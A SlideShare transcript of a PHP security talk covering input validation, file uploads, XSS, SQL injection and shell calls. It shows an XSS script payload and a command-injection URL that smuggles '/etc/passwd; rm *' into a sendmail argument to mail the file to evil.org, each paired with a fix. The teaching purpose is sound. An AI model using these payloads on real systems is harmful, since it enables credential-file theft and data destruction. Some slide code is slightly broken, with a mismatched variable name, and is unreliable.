Php Security

2,674 views

Published on

presentation given by uttam in PHPCamp

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,674
On SlideShare
0
From Embeds
0
Number of Embeds
13
Actions
Shares
0
Downloads
98
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Php Security

  1. 1. PHP Security by Uttam Kumar Email:- [email_address] Mobile:- 9730791715
  2. 2. What is Security? <ul><li>measurement… </li></ul><ul><li>safety… </li></ul><ul><li>protection… </li></ul>
  3. 3. Secure Web Applications <ul><li>web security issues have to do with: </li></ul><ul><ul><li>hacker attacks </li></ul></ul><ul><ul><ul><li>denial of service </li></ul></ul></ul><ul><ul><ul><li>server hijacking </li></ul></ul></ul><ul><ul><li>common threats </li></ul></ul><ul><ul><li>compromise of data </li></ul></ul>
  4. 4. PHP & Security <ul><li> a growing language… </li></ul><ul><li>a major concern… </li></ul>
  5. 5. Never trust the web… <ul><li>Input data validation </li></ul><ul><ul><li>register_globals = OFF </li></ul></ul><ul><ul><li>$_REQUEST[] big NO NO … </li></ul></ul><ul><ul><li>type casting input data </li></ul></ul><ul><ul><ul><li>No isNumeric() if data is numeric [locale problem] </li></ul></ul></ul><ul><ul><ul><li>regularExp if data is string </li></ul></ul></ul><ul><ul><li>Path validation </li></ul></ul><ul><ul><ul><li>Always use basename() </li></ul></ul></ul>
  6. 6. Never trust the web… <ul><li>Content size validation </li></ul><ul><ul><li>use server side max length validation </li></ul></ul><ul><ul><li>File Upload </li></ul></ul><ul><ul><ul><li>Check destination file size with $_FILES[‘name’][‘size’] </li></ul></ul></ul><ul><ul><ul><li>I think Browser MIME header is reliable right ? </li></ul></ul></ul><ul><ul><ul><ul><li>Use getImageSize() in case of image </li></ul></ul></ul></ul><ul><ul><ul><li>External source upload like Avtar </li></ul></ul></ul><ul><ul><ul><ul><li>Make a local copy if path/of/file submitted from a URL. </li></ul></ul></ul></ul>
  7. 7. XSS attack <ul><ul><li>Can lead to embarrassment. </li></ul></ul><ul><ul><li>Session take-over. </li></ul></ul><ul><ul><li>Password theft. </li></ul></ul><ul><ul><li>User tracking by 3 rd parties </li></ul></ul>
  8. 8. XSS attack <ul><li>Prevention is better than cure </li></ul><ul><ul><li>Use striptags() </li></ul></ul><ul><ul><ul><li>No tag allowance please </li></ul></ul></ul><ul><ul><li>Use htmlentities() </li></ul></ul><ul><ul><li>Is $_SERVER safe ? </li></ul></ul><ul><ul><ul><li>Can be set… </li></ul></ul></ul><ul><ul><ul><li>Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo </li></ul></ul></ul><ul><ul><ul><li>$_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo; </li></ul></ul></ul><ul><ul><ul><li>$_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo </li></ul></ul></ul><ul><ul><li>IP based info </li></ul></ul><ul><ul><ul><li>Use HTTP_X_FORWARDED_FOR </li></ul></ul></ul><ul><ul><ul><li>Use long2ip() </li></ul></ul></ul><ul><ul><ul><ul><li>$aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]); </li></ul></ul></ul></ul><ul><ul><ul><ul><li>$sValidIp = long2ip(ip2long(array_pop($ipss))); </li></ul></ul></ul></ul>
  9. 9. SQL Injection WWW <ul><ul><li>Arbitrary query execution </li></ul></ul><ul><ul><li>Removal of data. </li></ul></ul><ul><ul><li>Modification of existing values. </li></ul></ul><ul><ul><li>Denial of service. </li></ul></ul><ul><ul><li>Arbitrary data injection. </li></ul></ul>
  10. 10. Calling External Programs Sometimes you need to call external programs (using system( ), exec( ), popen( ), passthru( ), or the back-tick operator), this is extreemly dangerous if the program name or any of its arguments are based on user input. Instead use escapeshellarg( ) or escapeshellcmd( ) so that users can’t trick the system into executing arbitrary commands. <?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?> The user could control $to to yield: http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A which would result in running the command: /usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm * a solution would be: $fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);
  11. 11. Questions…????
  12. 12. Thank You !!

×